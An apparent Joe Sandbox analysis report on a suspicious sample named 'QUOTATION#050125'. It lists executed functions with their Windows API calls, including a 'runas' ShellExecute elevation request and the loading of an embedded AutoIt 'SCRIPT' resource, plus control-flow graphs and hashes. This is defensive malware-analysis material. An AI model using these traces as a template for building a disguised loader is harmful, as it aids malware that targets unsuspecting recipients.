99816->99772 99817->99777 99818->99780 99819->99784 99820->99788 99821->99781 99822->99787 99823->99791 99824->99793 99825->99793 99826->99793 99827->99793 99828->99747 99829->99751 99830->99758 99831->99762 99832->99766 99833->99771 99834->99775 99836 caec9 22 API calls 99835->99836 99837 c4c78 99836->99837 99837->99801 99838 c1033 99843 c4c91 99838->99843 99842 c1042 99844 ca961 22 API calls 99843->99844 99845 c4cff 99844->99845 99851 c3af0 99845->99851 99848 c4d9c 99849 c1038 99848->99849 99854 c51f7 22 API calls 99848->99854 99850 e00a3 29 API calls 99849->99850 99850->99842 99855 c3b1c 99851->99855 99854->99848 99856 c3b29 99855->99856 99857 c3b0f 99855->99857 99856->99857 99858 c3b30 RegOpenKeyExW 99856->99858 99857->99848 99858->99857 99859 c3b4a RegQueryValueExW 99858->99859 99860 c3b6b 99859->99860 99861 c3b80 RegCloseKey 99859->99861 99860->99861 99861->99857

                                                                                      Executed Functions

                                                                                      Function 000C42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 234 c42de-c434d call ca961 GetVersionExW call c6b57 239 103617-10362a 234->239 240 c4353 234->240 241 10362b-10362f 239->241 242 c4355-c4357 240->242 243 103631 241->243 244 103632-10363e 241->244 245 c435d-c43bc call c93b2 call c37a0 242->245 246 103656 242->246 243->244 244->241 247 103640-103642 244->247 261 c43c2-c43c4 245->261 262 1037df-1037e6 245->262 250 10365d-103660 246->250 247->242 249 103648-10364f 247->249 249->239 252 103651 249->252 253 103666-1036a8 250->253 254 c441b-c4435 GetCurrentProcess IsWow64Process 250->254 252->246 253->254 258 1036ae-1036b1 253->258 256 c4494-c449a 254->256 257 c4437 254->257 260 c443d-c4449 256->260 257->260 263 1036b3-1036bd 258->263 264 1036db-1036e5 258->264 270 c444f-c445e LoadLibraryA 260->270 271 103824-103828 GetSystemInfo 260->271 261->250 265 c43ca-c43dd 261->265 266 103806-103809 262->266 267 1037e8 262->267 272 1036ca-1036d6 263->272 273 1036bf-1036c5 263->273 268 1036e7-1036f3 264->268 269 1036f8-103702 264->269 274 103726-10372f 265->274 275 c43e3-c43e5 265->275 279 1037f4-1037fc 266->279 280 10380b-10381a 266->280 276 1037ee 267->276 268->254 277 103704-103710 269->277 278 103715-103721 269->278 281 c449c-c44a6 GetSystemInfo 270->281 282 c4460-c446e GetProcAddress 270->282 272->254 273->254 286 103731-103737 274->286 287 10373c-103748 274->287 284 c43eb-c43ee 275->284 285 10374d-103762 275->285 276->279 277->254 278->254 279->266 280->276 288 10381c-103822 280->288 283 c4476-c4478 281->283 282->281 289 c4470-c4474 GetNativeSystemInfo 282->289 294 c447a-c447b FreeLibrary 283->294 295 c4481-c4493 283->295 290 103791-103794 284->290 291 c43f4-c440f 284->291 292 103764-10376a 285->292 293 10376f-10377b 285->293 286->254 287->254 288->279 289->283 290->254 298 10379a-1037c1 290->298 296 103780-10378c 291->296 297 c4415 291->297 292->254 293->254 294->295 296->254 297->254 299 1037c3-1037c9 298->299 300 1037ce-1037da 298->300 299->254 300->254
                                                                                      APIs
                                                                                      • GetVersionExW.KERNEL32(?), ref: 000C430D
                                                                                      • GetCurrentProcess.KERNEL32(?,0015CB64,00000000,?,?), ref: 000C4422
                                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 000C4429
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 000C4454
                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000C4466
                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 000C4474
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 000C447B
                                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 000C44A0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64
                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                      • API String ID: 2834427828-3101561225
                                                                                      • Opcode ID: 4163626d5772927278403cfea605f28f49a57f836d3b1fdd8a9b53bf3e80218d
                                                                                      • Instruction ID: db7587102a40a58df5881e0f1bc71648e5fcf250f3e98e4bbb80a9438556a350
                                                                                      • Opcode Fuzzy Hash: 4163626d5772927278403cfea605f28f49a57f836d3b1fdd8a9b53bf3e80218d
                                                                                      • Instruction Fuzzy Hash: 3FA18376D0A3C2FFC716CB6A78416AD7FB87B26320B18449ED49197E62D36047C8CB61
                                                                                      Function 000C42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 553 c42a2-c42ba CreateStreamOnHGlobal 554 c42bc-c42d3 FindResourceExW 553->554 555 c42da-c42dd 553->555 556 c42d9 554->556 557 1035ba-1035c9 LoadResource 554->557 556->555 557->556 558 1035cf-1035dd SizeofResource 557->558 558->556 559 1035e3-1035ee LockResource 558->559 559->556 560 1035f4-1035fc 559->560 561 103600-103612 560->561 561->556
                                                                                      APIs
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,000C50AA,?,?,00000000,00000000), ref: 000C42B2
                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000C50AA,?,?,00000000,00000000), ref: 000C42C9
                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,000C50AA,?,?,00000000,00000000,?,?,?,?,?,?,000C4F20), ref: 001035BE
                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,000C50AA,?,?,00000000,00000000,?,?,?,?,?,?,000C4F20), ref: 001035D3
                                                                                      • LockResource.KERNEL32(000C50AA,?,?,000C50AA,?,?,00000000,00000000,?,?,?,?,?,?,000C4F20,?), ref: 001035E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                      • String ID: SCRIPT
                                                                                      • API String ID: 3051347437-3967369404
                                                                                      • Opcode ID: d76a7e9d54f7317ce1fcaadf43784a9dcaf41a1448cac42d0c233214586b4fe7
                                                                                      • Instruction ID: 82bd68b8611ed767056485405dd692ce703ab16ce168d5a52986b413788a9dbf
                                                                                      • Opcode Fuzzy Hash: d76a7e9d54f7317ce1fcaadf43784a9dcaf41a1448cac42d0c233214586b4fe7
                                                                                      • Instruction Fuzzy Hash: 6F117C70600700FFD7218F65DC49F2B7BB9EBC5B52F20416DB8169A6A0DB71D840DA60
                                                                                      Function 00102BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000C2B6B
                                                                                        • Part of subcall function 000C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00191418,?,000C2E7F,?,?,?,00000000), ref: 000C3A78
                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00182224), ref: 00102C10
                                                                                      • ShellExecuteW.SHELL32(00000000,?,?,00182224), ref: 00102C17
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow
                                                                                      • String ID: runas
                                                                                      • API String ID: 3686610399-4000483414
                                                                                      • Opcode ID: 46d86c3a60fd558d563c46b856a5679bea587fd4b527ebd07e15882b7ffdde2b
                                                                                      • Instruction ID: 679c2b2f75c00d100f84de83dfcfcf83a512bd1902dfed9549f553438934faa0
                                                                                      • Opcode Fuzzy Hash: 46d86c3a60fd558d563c46b856a5679bea587fd4b527ebd07e15882b7ffdde2b
                                                                                      • Instruction Fuzzy Hash: 7311E631208342AACB14FF60D896FFEBBA5AF95300F44542DF082174A3CF318A8AC752
                                                                                      Function 000CD730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetInputState.USER32 ref: 000CD807
                                                                                      • timeGetTime.WINMM ref: 000CDA07
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000CDB28
                                                                                      • TranslateMessage.USER32(?), ref: 000CDB7B
                                                                                      • DispatchMessageW.USER32(?), ref: 000CDB89
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000CDB9F
                                                                                      • Sleep.KERNEL32(0000000A), ref: 000CDBB1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                      • String ID:
                                                                                      • API String ID: 2189390790-0
                                                                                      • Opcode ID: 1a488624a1c405d9525cd524d1afecb7f495ed3a9051abda7cec2d1412d7d196
                                                                                      • Instruction ID: 55cee646107b16d88bcb72dce43a50625d4022677e09d370cec81926d059cb38
                                                                                      • Opcode Fuzzy Hash: 1a488624a1c405d9525cd524d1afecb7f495ed3a9051abda7cec2d1412d7d196
                                                                                      • Instruction Fuzzy Hash: 2642AE30608342EFD728DF24C885FAEB7E1BF86304F14456EE5568B692D770A894DB92
                                                                                      Function 000C2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000C2D07
                                                                                      • RegisterClassExW.USER32(00000030), ref: 000C2D31
                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C2D42
                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 000C2D5F
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000C2D6F
                                                                                      • LoadIconW.USER32(000000A9), ref: 000C2D85
                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000C2D94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                      • API String ID: 2914291525-1005189915
                                                                                      • Opcode ID: 67de3d04cbce7eaac04c98d75b28353ac3b286e51f674e27bc55d62b0453c15d
                                                                                      • Instruction ID: be21fe7e0f91b3c0d721edfd9c1b17c86909716ac55c3459bb1d50b7e0575016
                                                                                      • Opcode Fuzzy Hash: 67de3d04cbce7eaac04c98d75b28353ac3b286e51f674e27bc55d62b0453c15d
                                                                                      • Instruction Fuzzy Hash: C621F2B5901309EFDB00DFA4EC89BDDBBB4FB08706F00811AF911AAAA0D7B10584CF90
                                                                                      Function 000C2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000C2B8E
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 000C2B9D
                                                                                      • LoadIconW.USER32(00000063), ref: 000C2BB3
                                                                                      • LoadIconW.USER32(000000A4), ref: 000C2BC5
                                                                                      • LoadIconW.USER32(000000A2), ref: 000C2BD7
                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000C2BEF
                                                                                      • RegisterClassExW.USER32(?), ref: 000C2C40
                                                                                        • Part of subcall function 000C2CD4: GetSysColorBrush.USER32(0000000F), ref: 000C2D07
                                                                                        • Part of subcall function 000C2CD4: RegisterClassExW.USER32(00000030), ref: 000C2D31
                                                                                        • Part of subcall function 000C2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C2D42
                                                                                        • Part of subcall function 000C2CD4: InitCommonControlsEx.COMCTL32(?), ref: 000C2D5F
                                                                                        • Part of subcall function 000C2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000C2D6F
                                                                                        • Part of subcall function 000C2CD4: LoadIconW.USER32(000000A9), ref: 000C2D85
                                                                                        • Part of subcall function 000C2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000C2D94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                      • String ID: #$0$AutoIt v3
                                                                                      • API String ID: 423443420-4155596026
                                                                                      • Opcode ID: f4e985a3e25f49e24d66b73e1dff63fd20246cfa61c166f0e8fd7e89ed860d6c
                                                                                      • Instruction ID: fe26e3582c81eb33e1c8bf37f8c71140ac77193b9c675fbedcdc58c8f1bc6d6e
                                                                                      • Opcode Fuzzy Hash: f4e985a3e25f49e24d66b73e1dff63fd20246cfa61c166f0e8fd7e89ed860d6c
                                                                                      • Instruction Fuzzy Hash: 24210770E10319BFDB109FA5EC95AAD7FB4FB48B60F04412BE504A6AA0D7B516C0CF90
                                                                                      Function 000C3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 305 c3170-c3185 306 c31e5-c31e7 305->306 307 c3187-c318a 305->307 306->307 310 c31e9 306->310 308 c318c-c3193 307->308 309 c31eb 307->309 311 c3199-c319e 308->311 312 c3265-c326d PostQuitMessage 308->312 314 102dfb-102e23 call c18e2 call de499 309->314 315 c31f1-c31f6 309->315 313 c31d0-c31d8 DefWindowProcW 310->313 317 c31a4-c31a8 311->317 318 102e7c-102e90 call 12bf30 311->318 320 c3219-c321b 312->320 319 c31de-c31e4 313->319 349 102e28-102e2f 314->349 321 c321d-c3244 SetTimer RegisterWindowMessageW 315->321 322 c31f8-c31fb 315->322 324 c31ae-c31b3 317->324 325 102e68-102e77 call 12c161 317->325 318->320 343 102e96 318->343 320->319 321->320 326 c3246-c3251 CreatePopupMenu 321->326 328 102d9c-102d9f 322->328 329 c3201-c3214 KillTimer call c30f2 call c3c50 322->329 332 c31b9-c31be 324->332 333 102e4d-102e54 324->333 325->320 326->320 335 102da1-102da5 328->335 336 102dd7-102df6 MoveWindow 328->336 329->320 341 c31c4-c31ca 332->341 342 c3253-c3263 call c326f 332->342 333->313 346 102e5a-102e63 call 120ad7 333->346 344 102dc6-102dd2 SetFocus 335->344 345 102da7-102daa 335->345 336->320 341->313 341->349 342->320 343->313 344->320 345->341 350 102db0-102dc1 call c18e2 345->350 346->313 349->313 354 102e35-102e48 call c30f2 call c3837 349->354 350->320 354->313
                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,000C316A,?,?), ref: 000C31D8
                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,000C316A,?,?), ref: 000C3204
                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000C3227
                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,000C316A,?,?), ref: 000C3232
                                                                                      • CreatePopupMenu.USER32 ref: 000C3246
                                                                                      • PostQuitMessage.USER32(00000000), ref: 000C3267
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                      • String ID: TaskbarCreated
                                                                                      • API String ID: 129472671-2362178303
                                                                                      • Opcode ID: 958ea357a011e1193dc9c2114c8d471437d6a9d0583cf3d90911265b807cd78d
                                                                                      • Instruction ID: cd355492a345d4dfcc7de5553b5c1b6df36b864a425c3d3cd418806d0746e26f
                                                                                      • Opcode Fuzzy Hash: 958ea357a011e1193dc9c2114c8d471437d6a9d0583cf3d90911265b807cd78d
                                                                                      • Instruction Fuzzy Hash: CF41F835264305BEDF251B789D0EFBD3A65E709354F08811EF90196992CB718EC09BA1
                                                                                      Function 000C344D Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 201registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 000C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00191418,?,000C2E7F,?,?,?,00000000), ref: 000C3A78
                                                                                        • Part of subcall function 000C3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000C3379
                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000C356A
                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0010318D
                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001031CE
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00103210
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath
                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                      • API String ID: 338900592-2727554177
                                                                                      • Opcode ID: 400d7c850ec5ce48a8e063707a9b8d32016a1725cc8ff96b85842fe4c42a0f46
                                                                                      • Instruction ID: af32e742863418d70d3f016eeb32dd102594d11a6e200a039f543b555654bf6b
                                                                                      • Opcode Fuzzy Hash: 400d7c850ec5ce48a8e063707a9b8d32016a1725cc8ff96b85842fe4c42a0f46
                                                                                      • Instruction Fuzzy Hash: 5471A171505301AEC314DF25DC82DAFBBE8FF89340F40452EF495971A1EB709A88CBA1
                                                                                      Function 0010065B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 272COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 431 10065b-10068b call 10042f 434 1006a6-1006b2 call f5221 431->434 435 10068d-100698 call ef2c6 431->435 440 1006b4-1006c9 call ef2c6 call ef2d9 434->440 441 1006cb-100714 call 10039a 434->441 442 10069a-1006a1 call ef2d9 435->442 440->442 450 100781-10078a GetFileType 441->450 451 100716-10071f 441->451 452 10097d-100983 442->452 453 1007d3-1007d6 450->453 454 10078c-1007bd GetLastError call ef2a3 CloseHandle 450->454 456 100721-100725 451->456 457 100756-10077c GetLastError call ef2a3 451->457 460 1007d8-1007dd 453->460 461 1007df-1007e5 453->461 454->442 468 1007c3-1007ce call ef2d9 454->468 456->457 462 100727-100754 call 10039a 456->462 457->442 465 1007e9-100837 call f516a 460->465 461->465 466 1007e7 461->466 462->450 462->457 473 100847-10086b call 10014d 465->473 474 100839-100845 call 1005ab 465->474 466->465 468->442 481 10086d 473->481 482 10087e-1008c1 473->482 474->473 480 10086f-100879 call f86ae 474->480 480->452 481->480 484 1008e2-1008f0 482->484 485 1008c3-1008c7 482->485 488 1008f6-1008fa 484->488 489 10097b 484->489 485->484 487 1008c9-1008dd 485->487 487->484 488->489 490 1008fc-10092f CloseHandle call 10039a 488->490 489->452 493 100931-10095d GetLastError call ef2a3 call f5333 490->493 494 100963-100977 490->494 493->494 494->489
                                                                                      APIs
                                                                                        • Part of subcall function 0010039A: CreateFileW.KERNELBASE(00000000,00000000,?,00100704,?,?,00000000,?,00100704,00000000,0000000C), ref: 001003B7
                                                                                      • GetLastError.KERNEL32 ref: 0010076F
                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00100782
                                                                                      • GetLastError.KERNEL32 ref: 0010078C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001007B5
                                                                                      • CloseHandle.KERNEL32(?), ref: 001008FF
                                                                                      • GetLastError.KERNEL32 ref: 00100931
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CloseFileHandle$CreateType
                                                                                      • String ID: H
                                                                                      • API String ID: 3086256261-2852464175
                                                                                      • Opcode ID: 25838155a07724deea7506e28cf2246fd269850ebacd07b7104b1603ccda9686
                                                                                      • Instruction ID: 1323a7bc6bad1d214352c7f7926564c9b0b1155769eef22b43f1cade7152fca9
                                                                                      • Opcode Fuzzy Hash: 25838155a07724deea7506e28cf2246fd269850ebacd07b7104b1603ccda9686
                                                                                      • Instruction Fuzzy Hash: 86A12732A002488FDF1AAF68DC51BAD7BA0EB0A320F14415EF855AF3D2D7759D52CB91
                                                                                      Function 00E1A6D0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
